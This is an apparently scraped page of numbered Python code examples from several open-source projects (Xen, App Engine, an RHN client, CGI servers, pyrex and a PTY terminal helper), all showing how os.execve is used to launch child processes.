                try:
                    os.execve(self.device_model, args, env)
                except Exception, e:
                    print >> sys.stderr, (
                        'failed to set up fds or execute dm %s: %s' %
                        (self.device_model, utils.exception_string(e)))
                    os._exit(126)
            except:
                os._exit(127)
        else:
            osdep.postfork(contract, abandon=True)
            self.pid = pid
            os.close(null)
            os.close(logfd)
        sentinel_write.close()
        self.vm.storeDom("image/device-model-pid", self.pid)
        log.info("device model pid: %d", self.pid)
        # we would very much prefer not to have a thread here and instead
        #  have a callback but sadly we don't have Twisted in xend
        self.sentinel_thread = thread.start_new_thread(self._sentinel_watch,
                                                       ())
        if self.device_model.find('stubdom-dm') > -1:
            from xen.xend import XendDomain
            domains = XendDomain.instance()
            domains.domains_lock.release()

            count = 0
            while True:
                orig_state = xstransact.Read(
                    "/local/domain/0/device-model/%i/state" %
                    self.vm.getDomid())
                # This can occur right after start-up
                if orig_state != None:
                    break

                log.debug(
                    'createDeviceModel %i: orig_state is None, retrying' %
                    self.vm.getDomid())

                time.sleep(0.1)
                count += 1
                if count > 100:
                    break

            domains.domains_lock.acquire()
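
Behind the Xen-specific bookkeeping, the fork/dup2/execve sequence above is a standard way to launch a helper with its output captured in a log file. A stripped-down sketch of just that part (the 0o666 mode mirrors the snippet; the function and default path are illustrative):

import os


def spawn_logged(cmd, args, env, logfile='/tmp/child.log'):
    null = os.open('/dev/null', os.O_RDONLY)
    logfd = os.open(logfile, os.O_WRONLY | os.O_CREAT | os.O_APPEND, 0o666)
    pid = os.fork()
    if pid == 0:
        try:
            os.dup2(null, 0)   # stdin from /dev/null
            os.dup2(logfd, 1)  # stdout into the log
            os.dup2(logfd, 2)  # stderr into the log
            os.execve(cmd, args, env)
        finally:
            os._exit(127)      # reached only if execve failed
    os.close(null)
    os.close(logfd)
    return pid


# spawn_logged('/bin/echo', ['/bin/echo', 'hello'], {'PATH': '/bin'})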
Ejemplo n.º 50
0
    Tuple of (flags, rem) where "flags" is a map of key,value flags pairs
    and "rem" is a list that strips the used flags and acts as a new
    replacement for sys.argv.
  """
    parser = argparse.ArgumentParser(add_help=False)
    parser.add_argument('--dev_appserver',
                        default=os.path.join(SDK_BASE, 'dev_appserver.py'))
    namespace, rest = parser.parse_known_args()
    flags = vars(namespace)
    rem = [sys.argv[0]]
    rem.extend(rest)
    return flags, rem


if __name__ == '__main__':
    vals, new_argv = GetArgsAndArgv()
    tool = os.path.basename(__file__)
    bin = os.path.join(GOROOT, 'bin', tool)
    os.environ['GOROOT'] = GOROOT
    os.environ['APPENGINE_DEV_APPSERVER'] = vals['dev_appserver']

    # Remove env variables that may be incompatible with the SDK.
    for e in ('GOARCH', 'GOBIN', 'GOOS'):
        os.environ.pop(e, None)

    # Set a GOPATH if one is not set.
    if not os.environ.get('GOPATH'):
        os.environ['GOPATH'] = os.path.join(SDK_BASE, 'gopath')

    os.execve(bin, new_argv, os.environ)
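
The wrapper above tweaks the environment and then replaces itself with the real tool, so the caller never sees an intermediate process. A generic sketch of that wrapper pattern (the binary path and variables are placeholders):

import os
import sys


def wrap_tool(real_binary, overrides):
    env = os.environ.copy()
    env.update(overrides)
    # Forward the original arguments so the real tool sees the same invocation.
    os.execve(real_binary, [real_binary] + sys.argv[1:], env)


# wrap_tool('/usr/local/go/bin/go', {'GOROOT': '/usr/local/go'})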
Ejemplo n.º 51
0
def run(action_id, params, cache_only=None):

    # Setup SIGTERM handler
    sHandler = SignalHandler()
    signal.signal(signal.SIGTERM, sHandler.handle)
    cfg = config.initUp2dateConfig()
    local_config.init('rhncfg-client', defaults=dict(cfg.items()))

    tempfile.tempdir = local_config.get('script_tmp_dir')

    logfile_name = local_config.get('script_log_file')
    log_output = local_config.get('script_log_file_enable')

    if log_output:
        # If we're going to log, make sure we can create the logfile
        _create_path(logfile_name)

    if cache_only:
        return (0, "no-ops for caching", {})

    action_type = 'script.run'
    if not _local_permission_check(action_type):
        return _perm_error(action_type)


    extras = {'output':''}
    script = params.get('script')
    if not script:
        return (1, "No script to execute", {})

    username = params.get('username')
    groupname = params.get('groupname')

    if not username:
        return (1, "No username given to execute script as", {})

    if not groupname:
        return (1, "No groupname given to execute script as", {})

    timeout = params.get('timeout')

    if timeout:
        try:
            timeout = int(timeout)
        except ValueError:
            return (1, "Invalid timeout value", {})
    else:
        timeout = None

    db_now = params.get('now')
    if not db_now:
        return (1, "'now' argument missing", {})
    db_now = time.mktime(time.strptime(db_now, "%Y-%m-%d %H:%M:%S"))

    now = time.time()
    process_start = None
    process_end = None

    child_pid = None

    # determine uid/ugid for script ownership, uid also used for setuid...
    try:
        user_record = pwd.getpwnam(username)
    except KeyError:
        return 1, "No such user %s" % username, extras

    uid = user_record[2]
    ugid = user_record[3]


    # create the script on disk
    try:
        script_path = _create_script_file(script, uid=uid, gid=ugid)
    except OSError:
        e = sys.exc_info()[1]
        return 1, "Problem creating script file:  %s" % e, extras

    # determine gid to run script as
    try:
        group_record = grp.getgrnam(groupname)
    except KeyError:
        return 1, "No such group %s" % groupname, extras

    run_as_gid = group_record[2]


    # create some pipes to communicate w/ the child process
    (pipe_read, pipe_write) = os.pipe()

    process_start = time.time()
    child_pid = os.fork()

    if not child_pid:
        # Child: the pipe only carries child-to-parent output, so close the read end
        os.close(pipe_read)

        # Redirect both stdout and stderr to the pipe
        os.dup2(pipe_write, sys.stdout.fileno())
        os.dup2(pipe_write, sys.stderr.fileno())

        # Close unnecessary file descriptors (including pipe since it's duped)
        for i in range(3, MAXFD):
            try:
                os.close(i)
            except:
                pass

        # all scripts initial working directory will be /
        # puts burden on script writer to ensure cwd is correct within the
        # script
        os.chdir('/')

        # the child process gets the desired uid/gid
        os.setgid(run_as_gid)
        groups=[g.gr_gid for g in grp.getgrall() if username in g.gr_mem or username in g.gr_name]
        os.setgroups(groups)
        os.setuid(uid)

        # give this its own process group (which happens to be equal to its
        # pid)
        os.setpgrp()

        clean_env = {"PATH": "/sbin:/bin:/usr/sbin:/usr/bin", "TERM": "xterm"}
        # Finally, exec the script
        try:
            os.umask(int("022", 8))
            os.execve(script_path, [script_path, ], clean_env)
        finally:
            # This code can be reached only when script_path cannot be
            # executed, as otherwise execve never returns.
            # (The umask syscall always succeeds.)
            os._exit(1)

    # Parent doesn't write to child, so close that part
    os.close(pipe_write)

    output = None
    timed_out = None

    out_stream = tempfile.TemporaryFile()

    while 1:
        select_wait = None

        if timeout:
            elapsed = time.time() - process_start

            if elapsed >= timeout:
                timed_out = 1
                # Send TERM to all processes in the child's process group
                # Send KILL after that, just to make sure the child died
                os.kill(-child_pid, signal.SIGTERM)
                time.sleep(2)
                os.kill(-child_pid, signal.SIGKILL)
                break

            select_wait = timeout - elapsed

        # XXX try-except here for interrupted system calls
        input_fds, output_fds, error_fds = select.select([pipe_read], [], [], select_wait)

        if error_fds:
            # when would this happen?
            os.close(pipe_read)
            return 1, "Fatal exceptional case", extras

        if not (pipe_read in input_fds):
            # Read timed out, should be caught in the next loop
            continue

        output = os.read(pipe_read, 4096)
        if not output:
            # End of file from the child
            break

        out_stream.write(output)

    os.close(pipe_read)

    # wait for the child to complete
    (somepid, exit_status) = os.waitpid(child_pid, 0)
    process_end = time.time()

    # Copy the output from the temporary file
    out_stream.seek(0, 0)
    extras['output'] = out_stream.read()
    out_stream.close()

    # Log script-output locally, unless we're asked not to
    if log_output :
        set_logfile(logfile_name)
        log_to_file(0, extras['output'])

    # since output can contain chars that won't make xmlrpc very happy,
    # base64 encode it...
    extras['base64enc'] = 1
    extras['output'] = base64.encodestring(extras['output'])

    extras['return_code'] = exit_status

    # calculate start and end times in db's timespace
    extras['process_start'] = db_now + (process_start - now)
    extras['process_end'] = db_now + (process_end - now)

    for key in ('process_start', 'process_end'):
        extras[key] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(extras[key]))

    # clean up the script
    os.unlink(script_path)

    if timed_out:
        return 1, "Script killed, timeout of %s seconds exceeded" % timeout, extras

    if exit_status == 0:
        return 0, "Script executed", extras

    return 1, "Script failed", extras
Ejemplo n.º 52
0
    def parseFile(self, httpd, handler):
        env = {}
        env["SERVER_SOFTWARE"] = pConfig.getValue("base.software")
        env["SERVER_NAME"] = "localhost"
        env["GATEWAY_INTERFACE"] = "CGI/1.1"

        env["SERVER_PROTOCOL"] = "HTTP/1.1"
        env["SERVER_PORT"] = pConfig.getValue("base.port")
        env["REQUEST_METHOD"] = httpd.command

        env["PATH_INFO"] = os.path.dirname(httpd.path)
        env["PATH_TRANSLATED"] = os.path.dirname(
            pConfig.getValue("base.docroot") + httpd.path)
        env["QUERY_STRING"] = httpd.query

        env["REMOTE_ADDR"] = "127.0.0.1"
        env["REMOTE_HOST"] = ""

        env["AUTH_TYPE"] = ""
        env["REMOTE_IDENT"] = ""
        env["REMOTE_USER"] = ""

        length = httpd.headers.getheader("content-length")
        if length:
            env["CONTENT_LENGTH"] = length
            env["CONTENT_TYPE"] = httpd.headers.getheader("content-type")
        else:
            env["CONTENT_LENGTH"] = ""
            env["CONTENT_TYPE"] = ""

        #env["REQUEST_TIME"]	= ""
        #env["REMOTE_PORT"]		= ""

        env["SCRIPT_NAME"] = httpd.path
        env["REQUEST_URI"] = httpd.path
        env["DOCUMENT_ROOT"] = pConfig.getValue("base.docroot")
        env["SERVER_ADMIN"] = pConfig.getValue("base.admin")
        env["SCRIPT_FILENAME"] = pConfig.getValue("base.docroot") + httpd.path

        # collect the headers additionally sent by the user
        for key in httpd.headers.keys():
            newkey = key.upper().replace("-", "_")
            if not env.has_key(newkey):
                env["HTTP_" + newkey] = httpd.headers.getheader(key)

        os.environ.update(env)

        httpd.wfile.flush()

        # fork and pipe our cgi data
        r, w = os.pipe()

        pid = os.fork()
        if pid:
            # main process
            # read the pipe
            os.close(w)
            r = os.fdopen(r)
            output = r.read()

            pid, sts = os.waitpid(pid, 0)
        else:
            # child process
            # if there is client data then pipe it
            if length:
                os.dup2(httpd.rfile.fileno(), 0)

            # create the pipes
            os.close(r)
            w = os.fdopen(w, "w")
            os.dup2(w.fileno(), 1)
            os.execve(handler,
                      [handler,
                       pConfig.getValue("base.docroot") + httpd.path],
                      os.environ)

        # if there is client data then throw away additional data
        if length:
            while select.select([httpd.rfile], [], [], 0)[0]:
                if not httpd.rfile.read(1):
                    break

        # process the php output
        status = ""
        for line in output.split("\n"):
            if line == "":
                break
            if line.startswith("Status: "):
                status = line.split(" ")[1]
                break

        # sent data to the browser
        if status:
            httpd.send_response(int(status))
        else:
            httpd.send_response(200, "Script output follows")
        httpd.wfile.write(output)
        httpd.wfile.flush()
Ejemplo n.º 53
0
    def run(args):
        config, _ = load_configs(args.conffile)

        runid = config['build']['runid']

        if use_docker(config):
            if not runid:
                print(
                    "Docker was not enabled when the environment was setup. Cannot use it now!"
                )
                return 1

            docker_path = config['config']['dockerpath']

            try:
                buildid = get_image_id(config, runid)
            except subprocess.CalledProcessError as e:
                print("Cannot verify docker image: %s\n" % e.output)
                return 1

            if buildid != config['build']['buildid']:
                sys.stderr.write(
                    "WARNING: buildid for docker image %s has changed\n" %
                    runid)

            if config['config']['buildlocal'] == '1' and config['build'][
                    'buildhash'] != get_build_hash(config):
                sys.stderr.write(
                    "WARNING: The docker image source has changed and should be rebuilt.\n"
                    "Try running: 'pyrex-rebuild'\n")

            # These are "hidden" keys in pyrex.ini that aren't publicized, and
            # are primarily used for testing. Use they at your own risk, they
            # may change
            uid = int(config['run'].get('uid', os.getuid()))
            gid = int(config['run'].get('gid', os.getgid()))
            username = config['run'].get('username') or pwd.getpwuid(
                uid).pw_name
            groupname = config['run'].get('groupname') or grp.getgrgid(
                gid).gr_name
            init_command = config['run'].get('initcommand',
                                             config['build']['initcommand'])

            command_prefix = config['run'].get('commandprefix',
                                               '').splitlines()

            docker_args = [
                docker_path,
                'run',
                '--rm',
                '-i',
                '--net=host',
                '-e',
                'PYREX_USER=%s' % username,
                '-e',
                'PYREX_UID=%d' % uid,
                '-e',
                'PYREX_GROUP=%s' % groupname,
                '-e',
                'PYREX_GID=%d' % gid,
                '-e',
                'PYREX_HOME=%s' % os.environ['HOME'],
                '-e',
                'PYREX_INIT_COMMAND=%s' % init_command,
                '-e',
                'PYREX_OEROOT=%s' % config['build']['oeroot'],
                '-e',
                'PYREX_CLEANUP_EXIT_WAIT',
                '-e',
                'PYREX_CLEANUP_LOG_FILE',
                '-e',
                'PYREX_CLEANUP_LOG_LEVEL',
                '-e',
                'PYREX_COMMAND_PREFIX=%s' % ' '.join(command_prefix),
                '-e',
                'TINI_VERBOSITY',
                '--workdir',
                os.getcwd(),
            ]

            # Run the docker image with a TTY if this script was run in a tty
            if os.isatty(1):
                docker_args.extend(
                    ['-t', '-e', 'TERM=%s' % os.environ['TERM']])

            # Configure binds
            for b in set(config['run']['bind'].split()):
                docker_args.extend(
                    ['--mount', 'type=bind,src={b},dst={b}'.format(b=b)])

            # Pass environment variables
            for e in config['run']['envvars'].split():
                docker_args.extend(['-e', e])

            # Special case: Make the user SSH authentication socket available in Docker
            if 'SSH_AUTH_SOCK' in os.environ:
                docker_args.extend([
                    '--mount',
                    'type=bind,src=%s,dst=/tmp/%s-ssh-agent-sock' %
                    (os.environ['SSH_AUTH_SOCK'], username),
                    '-e',
                    'SSH_AUTH_SOCK=/tmp/%s-ssh-agent-sock' % username,
                ])

            # Pass along BB_ENV_EXTRAWHITE and anything it has whitelisted
            if 'BB_ENV_EXTRAWHITE' in os.environ:
                docker_args.extend(['-e', 'BB_ENV_EXTRAWHITE'])
                for e in os.environ['BB_ENV_EXTRAWHITE'].split():
                    docker_args.extend(['-e', e])

            docker_args.extend(shlex.split(config['run'].get('args', '')))

            docker_args.append('--')
            docker_args.append(runid)
            docker_args.extend(args.command)

            stop_coverage()

            os.execvp(docker_args[0], docker_args)

            print("Cannot exec docker!")
            sys.exit(1)
        else:
            startup_args = [
                os.path.join(config['build']['pyrexroot'], 'docker',
                             'startup.sh')
            ]
            startup_args.extend(args.command)

            env = os.environ.copy()
            env['PYREX_INIT_COMMAND'] = config['build']['initcommand']
            env['PYREX_OEROOT'] = config['build']['oeroot']

            stop_coverage()

            os.execve(startup_args[0], startup_args, env)

            print("Cannot exec startup script")
            sys.exit(1)
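
Note that the docker branch above uses os.execvp (PATH lookup, inherited environment) while the local branch uses os.execve (explicit path, explicit environment). A tiny sketch of that distinction (the helper is illustrative, not part of pyrex):

import os
import sys


def exec_replacing(argv, env=None):
    try:
        if env is None:
            # execvp searches PATH and inherits os.environ.
            os.execvp(argv[0], argv)
        else:
            # execve takes a resolvable path and an explicit environment.
            os.execve(argv[0], argv, env)
    except OSError as e:
        print("Cannot exec %s: %s" % (argv[0], e), file=sys.stderr)
        sys.exit(1)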
Ejemplo n.º 54
0
    def execute(self) -> bool:
        if (old_dir := os.getcwd()) != self.working_directory:
            os.chdir(self.working_directory)

        # Note: If for any reason we get a Python exception between here
        #   and os.close(), the traceback will get locked inside
        #   stdout of the child_fd object. `os.read(self.child_fd, 8192)` is the
        #   only way to get the traceback without losing it.
        self.pid, self.child_fd = pty.fork()
        os.chdir(old_dir)

        if not self.pid:
            try:
                os.execve(self.cmd[0], self.cmd, {
                    **os.environ,
                    **self.environment_vars
                })
            except FileNotFoundError:
                log(f"{self.cmd[0]} does not exist.",
                    level=logging.ERROR,
                    fg="red")
                self.exit_code = 1
                return False

        self.started = time.time()
        self.poll_object.register(self.child_fd, EPOLLIN | EPOLLHUP)

        return True

    def decode(self, encoding='UTF-8'):
        return self._trace_log.decode(encoding)
Ejemplo n.º 55
0
    def __call__(self):
        logging.debug('Executing %s', self.exbin)
        return os.execve(self.exbin, self.argv, self.env)
Ejemplo n.º 56
0
        args = [fsencode_w(space, w_arg) for w_arg in args_w]
    except OperationError, e:
        if not e.match(space, space.w_TypeError):
            raise
        msg = "execv() arg 2 must be an iterable of strings"
        raise OperationError(space.w_TypeError, space.wrap(str(msg)))
    #
    if w_env is None:  # when called via execv() above
        try:
            os.execv(command, args)
        except OSError, e:
            raise wrap_oserror(space, e)
    else:
        env = _env2interp(space, w_env)
        try:
            os.execve(command, args, env)
        except OSError, e:
            raise wrap_oserror(space, e)


@unwrap_spec(mode=int, path='str0')
def spawnv(space, mode, path, w_args):
    args = [space.str0_w(w_arg) for w_arg in space.unpackiterable(w_args)]
    try:
        ret = os.spawnv(mode, path, args)
    except OSError, e:
        raise wrap_oserror(space, e)
    return space.wrap(ret)


@unwrap_spec(mode=int, path='str0')
Ejemplo n.º 57
0
        if (len(process2) == 2):
            args2 = [process2[0], process2[1]]
        else:
            args2 = [process2[0]]

        os.close(r)
        w = os.fdopen(w, "w")
        print("child writing to pipe")
        fd = sys.stdout.fileno()  # os.open(outputFname, os.O_CREAT)
        os.set_inheritable(fd, True)
        os.write(2, ("Child: opened fd=%d for writing\n" % fd).encode())
        for dir in re.split(":",
                            os.environ['PATH']):  # try each directory in path
            program = "%s/%s" % (dir, args1[0])
            try:
                os.execve(program, args1, os.environ)  # try to exec program
            except FileNotFoundError:  # ...expected
                pass  # ...fail quietly

        os.write(2,
                 ("Child:    Error: Could not exec %s\n" % args1[0]).encode())
        sys.exit(1)  # terminate with error

    #second process after pipe
    lc = os.fork()

    if lc < 0:
        os.write(2, ("fork failed, returning %d\n" % lc).encode())
        sys.exit(1)

    elif lc == 0:
Ejemplo n.º 58
0
        get_var_assert_set('EXHIBITOR_STATICENSEMBLE')
    ]
else:
    print("ERROR: No known exhibitor backend:", exhibitor_backend)
    sys.exit(1)

truststore_path = '/var/lib/dcos/exhibitor-tls-artifacts/truststore.jks'
clientstore_path = '/var/lib/dcos/exhibitor-tls-artifacts/clientstore.jks'
serverstore_path = '/var/lib/dcos/exhibitor-tls-artifacts/serverstore.jks'

exhibitor_env = os.environ.copy()
if os.path.exists(truststore_path) and \
   os.path.exists(clientstore_path) and \
   os.path.exists(serverstore_path):
    exhibitor_env['EXHIBITOR_TLS_TRUSTSTORE_PATH'] = truststore_path
    exhibitor_env[
        'EXHIBITOR_TLS_TRUSTSTORE_PASSWORD'] = '******'
    exhibitor_env['EXHIBITOR_TLS_CLIENT_KEYSTORE_PATH'] = clientstore_path
    exhibitor_env[
        'EXHIBITOR_TLS_CLIENT_KEYSTORE_PASSWORD'] = '******'
    exhibitor_env['EXHIBITOR_TLS_SERVER_KEYSTORE_PATH'] = serverstore_path
    exhibitor_env[
        'EXHIBITOR_TLS_SERVER_KEYSTORE_PASSWORD'] = '******'
    exhibitor_env['EXHIBITOR_TLS_REQUIRE_CLIENT_CERT'] = 'true'
    exhibitor_env['EXHIBITOR_TLS_VERIFY_PEER_CERT'] = 'true'

# Start exhibitor
print("Running exhibitor as command:", exhibitor_cmdline)
sys.stdout.flush()
os.execve('/opt/mesosphere/bin/java', exhibitor_cmdline, exhibitor_env)
Ejemplo n.º 59
0
    def run_cgi(self):
        """Execute a CGI script."""
        dir, rest = self.cgi_info
        path = dir + '/' + rest
        i = path.find('/', len(dir)+1)
        while i >= 0:
            nextdir = path[:i]
            nextrest = path[i+1:]

            scriptdir = self.translate_path(nextdir)
            if os.path.isdir(scriptdir):
                dir, rest = nextdir, nextrest
                i = path.find('/', len(dir)+1)
            else:
                break

        # find an explicit query string, if present.
        rest, _, query = rest.partition('?')

        # dissect the part after the directory name into a script name &
        # a possible additional path, to be stored in PATH_INFO.
        i = rest.find('/')
        if i >= 0:
            script, rest = rest[:i], rest[i:]
        else:
            script, rest = rest, ''

        scriptname = dir + '/' + script
        scriptfile = self.translate_path(scriptname)
        if not os.path.exists(scriptfile):
            self.send_error(
                HTTPStatus.NOT_FOUND,
                "No such CGI script (%r)" % scriptname)
            return
        if not os.path.isfile(scriptfile):
            self.send_error(
                HTTPStatus.FORBIDDEN,
                "CGI script is not a plain file (%r)" % scriptname)
            return
        ispy = self.is_python(scriptname)
        if self.have_fork or not ispy:
            if not self.is_executable(scriptfile):
                self.send_error(
                    HTTPStatus.FORBIDDEN,
                    "CGI script is not executable (%r)" % scriptname)
                return

        # Reference: http://hoohoo.ncsa.uiuc.edu/cgi/env.html
        # XXX Much of the following could be prepared ahead of time!
        env = copy.deepcopy(os.environ)
        env['SERVER_SOFTWARE'] = self.version_string()
        env['SERVER_NAME'] = self.server.server_name
        env['GATEWAY_INTERFACE'] = 'CGI/1.1'
        env['SERVER_PROTOCOL'] = self.protocol_version
        env['SERVER_PORT'] = str(self.server.server_port)
        env['REQUEST_METHOD'] = self.command
        uqrest = urllib.parse.unquote(rest)
        env['PATH_INFO'] = uqrest
        env['PATH_TRANSLATED'] = self.translate_path(uqrest)
        env['SCRIPT_NAME'] = scriptname
        if query:
            env['QUERY_STRING'] = query
        env['REMOTE_ADDR'] = self.client_address[0]
        authorization = self.headers.get("authorization")
        if authorization:
            authorization = authorization.split()
            if len(authorization) == 2:
                import base64, binascii
                env['AUTH_TYPE'] = authorization[0]
                if authorization[0].lower() == "basic":
                    try:
                        authorization = authorization[1].encode('ascii')
                        authorization = base64.decodebytes(authorization).\
                                        decode('ascii')
                    except (binascii.Error, UnicodeError):
                        pass
                    else:
                        authorization = authorization.split(':')
                        if len(authorization) == 2:
                            env['REMOTE_USER'] = authorization[0]
        # XXX REMOTE_IDENT
        if self.headers.get('content-type') is None:
            env['CONTENT_TYPE'] = self.headers.get_content_type()
        else:
            env['CONTENT_TYPE'] = self.headers['content-type']
        length = self.headers.get('content-length')
        if length:
            env['CONTENT_LENGTH'] = length
        referer = self.headers.get('referer')
        if referer:
            env['HTTP_REFERER'] = referer
        accept = []
        for line in self.headers.getallmatchingheaders('accept'):
            if line[:1] in "\t\n\r ":
                accept.append(line.strip())
            else:
                accept = accept + line[7:].split(',')
        env['HTTP_ACCEPT'] = ','.join(accept)
        ua = self.headers.get('user-agent')
        if ua:
            env['HTTP_USER_AGENT'] = ua
        co = filter(None, self.headers.get_all('cookie', []))
        cookie_str = ', '.join(co)
        if cookie_str:
            env['HTTP_COOKIE'] = cookie_str
        # XXX Other HTTP_* headers
        # Since we're setting the env in the parent, provide empty
        # values to override previously set values
        for k in ('QUERY_STRING', 'REMOTE_HOST', 'CONTENT_LENGTH',
                  'HTTP_USER_AGENT', 'HTTP_COOKIE', 'HTTP_REFERER'):
            env.setdefault(k, "")

        self.send_response(HTTPStatus.OK, "Script output follows")
        self.flush_headers()

        decoded_query = query.replace('+', ' ')

        if self.have_fork:
            # Unix -- fork as we should
            args = [script]
            if '=' not in decoded_query:
                args.append(decoded_query)
            nobody = nobody_uid()
            self.wfile.flush() # Always flush before forking
            pid = os.fork()
            if pid != 0:
                # Parent
                pid, sts = os.waitpid(pid, 0)
                # throw away additional data [see bug #427345]
                while select.select([self.rfile], [], [], 0)[0]:
                    if not self.rfile.read(1):
                        break
                if sts:
                    self.log_error("CGI script exit status %#x", sts)
                return
            # Child
            try:
                try:
                    os.setuid(nobody)
                except OSError:
                    pass
                os.dup2(self.rfile.fileno(), 0)
                os.dup2(self.wfile.fileno(), 1)
                os.execve(scriptfile, args, env)
            except:
                self.server.handle_error(self.request, self.client_address)
                os._exit(127)

        else:
            # Non-Unix -- use subprocess
            import subprocess
            cmdline = [scriptfile]
            if self.is_python(scriptfile):
                interp = sys.executable
                if interp.lower().endswith("w.exe"):
                    # On Windows, use python.exe, not pythonw.exe
                    interp = interp[:-5] + interp[-4:]
                cmdline = [interp, '-u'] + cmdline
            if '=' not in query:
                cmdline.append(query)
            self.log_message("command: %s", subprocess.list2cmdline(cmdline))
            try:
                nbytes = int(length)
            except (TypeError, ValueError):
                nbytes = 0
            p = subprocess.Popen(cmdline,
                                 stdin=subprocess.PIPE,
                                 stdout=subprocess.PIPE,
                                 stderr=subprocess.PIPE,
                                 env = env
                                 )
            if self.command.lower() == "post" and nbytes > 0:
                data = self.rfile.read(nbytes)
            else:
                data = None
            # throw away additional data [see bug #427345]
            while select.select([self.rfile._sock], [], [], 0)[0]:
                if not self.rfile._sock.recv(1):
                    break
            stdout, stderr = p.communicate(data)
            self.wfile.write(stdout)
            if stderr:
                self.log_error('%s', stderr)
            p.stderr.close()
            p.stdout.close()
            status = p.returncode
            if status:
                self.log_error("CGI script exit status %#x", status)
            else:
                self.log_message("CGI script exited OK")
Ejemplo n.º 60
0
    async def _create_process(self, interactive, command, size):
        if not interactive:
            proc = await asyncio.create_subprocess_shell(
                command,
                stdin=asyncio.subprocess.PIPE,
                stdout=asyncio.subprocess.PIPE,
                stderr=asyncio.subprocess.PIPE,
                close_fds=True,
            )
            stdin = proc.stdin
            stdout = proc.stdout
            stderr = proc.stderr
        else:
            if sys.platform == "win32":
                if self._pty_enabled:
                    cmd = (
                        "conhost.exe",
                        "--headless",
                        "--width",
                        str(size[0]),
                        "--height",
                        str(size[1]),
                        "--",
                        command or "cmd.exe",
                    )
                else:
                    cmd = (command or "cmd.exe",)
                proc = await asyncio.create_subprocess_exec(
                    *cmd,
                    stdin=asyncio.subprocess.PIPE,
                    stdout=asyncio.subprocess.PIPE,
                    stderr=asyncio.subprocess.PIPE,
                )
                stdin = proc.stdin
                stdout = proc.stdout
                stderr = proc.stderr
            else:
                import pty

                cmdline = list(shlex.split(command or os.environ.get("SHELL", "sh")))
                exe = cmdline[0]
                if exe[0] != "/":
                    for it in os.environ["PATH"].split(":"):
                        path = os.path.join(it, exe)
                        if os.path.isfile(path):
                            exe = path
                            break

                pid, fd = pty.fork()
                if pid == 0:
                    # child process
                    sys.stdout.flush()
                    try:
                        os.execve(exe, cmdline, os.environ)
                    except Exception as e:
                        sys.stderr.write(str(e))
                        os._exit(1)  # do not fall through into the parent's code path
                else:
                    self.resize(fd, size)
                    proc = utils.Process(pid)
                    stdin = utils.AsyncFileDescriptor(fd)
                    stdout = utils.AsyncFileDescriptor(fd)
                    stderr = None
        return proc, stdin, stdout, stderr